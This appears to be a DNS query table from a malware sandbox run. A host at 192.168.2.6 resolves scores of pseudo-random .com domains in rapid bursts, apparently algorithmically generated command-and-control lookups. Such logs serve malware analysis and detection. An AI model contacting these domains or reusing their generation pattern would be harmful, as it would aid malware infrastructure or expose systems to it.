                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.435158968 CET192.168.2.61.1.1.10x2d41Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.313244104 CET192.168.2.61.1.1.10x807fStandard query (0)ww8.galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.328984022 CET192.168.2.61.1.1.10xa83bStandard query (0)ww3.galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.346052885 CET192.168.2.61.1.1.10xe25aStandard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.349822044 CET192.168.2.61.1.1.10xe91fStandard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.353801966 CET192.168.2.61.1.1.10xfb1Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.361577034 CET192.168.2.61.1.1.10x6337Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.366065025 CET192.168.2.61.1.1.10x394bStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.367285967 CET192.168.2.61.1.1.10xe995Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.384489059 CET192.168.2.61.1.1.10xb058Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.385446072 CET192.168.2.61.1.1.10x454eStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.387006044 CET192.168.2.61.1.1.10xa8d2Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.388262987 CET192.168.2.61.1.1.10xdd56Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.394844055 CET192.168.2.61.1.1.10xbddcStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.410953045 CET192.168.2.61.1.1.10x5da1Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.419688940 CET192.168.2.61.1.1.10xb11bStandard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.424951077 CET192.168.2.61.1.1.10x81adStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.427814007 CET192.168.2.61.1.1.10x1896Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.428821087 CET192.168.2.61.1.1.10x7973Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.444664955 CET192.168.2.61.1.1.10x248dStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.445023060 CET192.168.2.61.1.1.10x7cbeStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.450146914 CET192.168.2.61.1.1.10xbc7dStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.453931093 CET192.168.2.61.1.1.10x306aStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.455847025 CET192.168.2.61.1.1.10xebbaStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.458620071 CET192.168.2.61.1.1.10xf96Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.468007088 CET192.168.2.61.1.1.10x9781Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.468827963 CET192.168.2.61.1.1.10xe0efStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.543097019 CET192.168.2.61.1.1.10xcf68Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.549917936 CET192.168.2.61.1.1.10x62dbStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.563604116 CET192.168.2.61.1.1.10xbe03Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.571603060 CET192.168.2.61.1.1.10x10beStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.588484049 CET192.168.2.61.1.1.10xff5eStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.589489937 CET192.168.2.61.1.1.10xe185Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.589943886 CET192.168.2.61.1.1.10x5c02Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.590672016 CET192.168.2.61.1.1.10x6ca3Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.620101929 CET192.168.2.61.1.1.10xf714Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.621606112 CET192.168.2.61.1.1.10xb281Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.645428896 CET192.168.2.61.1.1.10x5f0aStandard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.645728111 CET192.168.2.61.1.1.10x6873Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.646007061 CET192.168.2.61.1.1.10xd8fbStandard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.646249056 CET192.168.2.61.1.1.10x42abStandard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.646466970 CET192.168.2.61.1.1.10xb046Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.646656036 CET192.168.2.61.1.1.10x17f1Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.652326107 CET192.168.2.61.1.1.10xc783Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.665158987 CET192.168.2.61.1.1.10xfb7Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.665330887 CET192.168.2.61.1.1.10x1acdStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.665642023 CET192.168.2.61.1.1.10x4942Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.665957928 CET192.168.2.61.1.1.10x3911Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.672481060 CET192.168.2.61.1.1.10x1652Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.673048019 CET192.168.2.61.1.1.10x8703Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.673651934 CET192.168.2.61.1.1.10xcc09Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.676316023 CET192.168.2.61.1.1.10x6ebfStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.676779985 CET192.168.2.61.1.1.10x81d3Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.685956001 CET192.168.2.61.1.1.10x74b1Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.687298059 CET192.168.2.61.1.1.10x9f1eStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.687725067 CET192.168.2.61.1.1.10x21c8Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.688175917 CET192.168.2.61.1.1.10x6cc6Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.688376904 CET192.168.2.61.1.1.10xee8aStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.688544989 CET192.168.2.61.1.1.10xedbStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.690730095 CET192.168.2.61.1.1.10xaf7fStandard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.691030025 CET192.168.2.61.1.1.10xef26Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.691454887 CET192.168.2.61.1.1.10x6c9aStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.694997072 CET192.168.2.61.1.1.10xdaddStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.695271969 CET192.168.2.61.1.1.10x96d2Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.695518970 CET192.168.2.61.1.1.10xab4bStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.712315083 CET192.168.2.61.1.1.10xa7f7Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.716938972 CET192.168.2.61.1.1.10xd256Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.678922892 CET192.168.2.61.1.1.10x41d1Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.687304020 CET192.168.2.61.1.1.10x9015Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.690649986 CET192.168.2.61.1.1.10x91adStandard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.691045046 CET192.168.2.61.1.1.10x5521Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.694417953 CET192.168.2.61.1.1.10x61b4Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.700654984 CET192.168.2.61.1.1.10x85bStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.707710028 CET192.168.2.61.1.1.10xda5dStandard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.708123922 CET192.168.2.61.1.1.10x9f6aStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.714607000 CET192.168.2.61.1.1.10x5e07Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.714782000 CET192.168.2.61.1.1.10x332dStandard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.716830015 CET192.168.2.61.1.1.10xd02aStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.718161106 CET192.168.2.61.1.1.10xaa05Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.718504906 CET192.168.2.61.1.1.10x1e72Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.719069004 CET192.168.2.61.1.1.10x2de1Standard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.719429016 CET192.168.2.61.1.1.10x2cd5Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.719788074 CET192.168.2.61.1.1.10x271aStandard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.720439911 CET192.168.2.61.1.1.10x9769Standard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.720674038 CET192.168.2.61.1.1.10xdfbdStandard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.721852064 CET192.168.2.61.1.1.10x830eStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.721852064 CET192.168.2.61.1.1.10x50dbStandard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.721852064 CET192.168.2.61.1.1.10x5282Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.722505093 CET192.168.2.61.1.1.10x85d7Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.723274946 CET192.168.2.61.1.1.10xacfeStandard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.723417044 CET192.168.2.61.1.1.10x7cbfStandard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.724001884 CET192.168.2.61.1.1.10xa311Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.724322081 CET192.168.2.61.1.1.10x6c62Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.731894016 CET192.168.2.61.1.1.10x90d9Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.776287079 CET192.168.2.61.1.1.10x15c2Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.776494026 CET192.168.2.61.1.1.10xd1b1Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.776808023 CET192.168.2.61.1.1.10x62d5Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.777476072 CET192.168.2.61.1.1.10x860cStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.778069019 CET192.168.2.61.1.1.10xcbacStandard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.778481007 CET192.168.2.61.1.1.10x6bf1Standard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.784154892 CET192.168.2.61.1.1.10x54f5Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.784334898 CET192.168.2.61.1.1.10x35a0Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.784554958 CET192.168.2.61.1.1.10xa24eStandard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.785152912 CET192.168.2.61.1.1.10x12a1Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.801676035 CET192.168.2.61.1.1.10xc577Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.807682991 CET192.168.2.61.1.1.10xa5a0Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.808665991 CET192.168.2.61.1.1.10xce0Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.816545963 CET192.168.2.61.1.1.10x589Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.816962004 CET192.168.2.61.1.1.10x3a80Standard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.817842960 CET192.168.2.61.1.1.10xdcc2Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.817909956 CET192.168.2.61.1.1.10xb6adStandard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.821347952 CET192.168.2.61.1.1.10x4d1cStandard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.821791887 CET192.168.2.61.1.1.10x2d66Standard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.822055101 CET192.168.2.61.1.1.10xc6b2Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.822360039 CET192.168.2.61.1.1.10x377eStandard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.822751045 CET192.168.2.61.1.1.10xad1aStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.822988033 CET192.168.2.61.1.1.10xd639Standard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823146105 CET192.168.2.61.1.1.10xe776Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823164940 CET192.168.2.61.1.1.10x7a8eStandard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823345900 CET192.168.2.61.1.1.10x7d5eStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823406935 CET192.168.2.61.1.1.10xd4d9Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823664904 CET192.168.2.61.1.1.10x5c7cStandard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.823869944 CET192.168.2.61.1.1.10xd87cStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.824050903 CET192.168.2.61.1.1.10x3fabStandard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.825711966 CET192.168.2.61.1.1.10xf943Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.825942039 CET192.168.2.61.1.1.10x9a54Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.826180935 CET192.168.2.61.1.1.10xb170Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.826210022 CET192.168.2.61.1.1.10x79ecStandard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.826420069 CET192.168.2.61.1.1.10x8198Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.829051018 CET192.168.2.61.1.1.10xa9a5Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.830120087 CET192.168.2.61.1.1.10xb78aStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.665096998 CET192.168.2.61.1.1.10xd6eStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.711780071 CET192.168.2.61.1.1.10x9514Standard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.846554041 CET192.168.2.61.1.1.10xe389Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.849725962 CET192.168.2.61.1.1.10x314fStandard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.852710009 CET192.168.2.61.1.1.10x6072Standard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.854630947 CET192.168.2.61.1.1.10xa00eStandard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.855052948 CET192.168.2.61.1.1.10x694eStandard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.864429951 CET192.168.2.61.1.1.10xa4d0Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.864454985 CET192.168.2.61.1.1.10xb016Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.878360987 CET192.168.2.61.1.1.10x4155Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.878458023 CET192.168.2.61.1.1.10x818aStandard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.882123947 CET192.168.2.61.1.1.10xb1daStandard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.883652925 CET192.168.2.61.1.1.10xc74dStandard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.884468079 CET192.168.2.61.1.1.10x6c03Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.888263941 CET192.168.2.61.1.1.10x1d58Standard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.889532089 CET192.168.2.61.1.1.10x8d23Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.891047001 CET192.168.2.61.1.1.10x6d27Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.891925097 CET192.168.2.61.1.1.10x6345Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.892970085 CET192.168.2.61.1.1.10xc7c3Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.893501997 CET192.168.2.61.1.1.10x9201Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.928540945 CET192.168.2.61.1.1.10xfa95Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.931596994 CET192.168.2.61.1.1.10x60b2Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.934118986 CET192.168.2.61.1.1.10xc624Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.935231924 CET192.168.2.61.1.1.10xfd92Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.937438965 CET192.168.2.61.1.1.10xd7d2Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.941703081 CET192.168.2.61.1.1.10x152aStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.942559958 CET192.168.2.61.1.1.10x22c7Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.954993010 CET192.168.2.61.1.1.10x38a8Standard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.955228090 CET192.168.2.61.1.1.10x3971Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.955557108 CET192.168.2.61.1.1.10xe4bdStandard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.955606937 CET192.168.2.61.1.1.10xc275Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.955849886 CET192.168.2.61.1.1.10x8c6aStandard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.956105947 CET192.168.2.61.1.1.10xeef2Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.956151962 CET192.168.2.61.1.1.10xc8f0Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.956366062 CET192.168.2.61.1.1.10xc462Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.956552029 CET192.168.2.61.1.1.10x9e54Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.972719908 CET192.168.2.61.1.1.10x225dStandard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.973006964 CET192.168.2.61.1.1.10x4902Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.973169088 CET192.168.2.61.1.1.10x3d15Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.973627090 CET192.168.2.61.1.1.10x3ae7Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.974133015 CET192.168.2.61.1.1.10xd80fStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.974469900 CET192.168.2.61.1.1.10xde88Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.974797010 CET192.168.2.61.1.1.10xf7c2Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.974936962 CET192.168.2.61.1.1.10xc0f7Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.975137949 CET192.168.2.61.1.1.10xea00Standard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.975156069 CET192.168.2.61.1.1.10x885cStandard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.975382090 CET192.168.2.61.1.1.10xde7fStandard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.975414038 CET192.168.2.61.1.1.10xa7f3Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.975651979 CET192.168.2.61.1.1.10x1bacStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.975842953 CET192.168.2.61.1.1.10x88c8Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
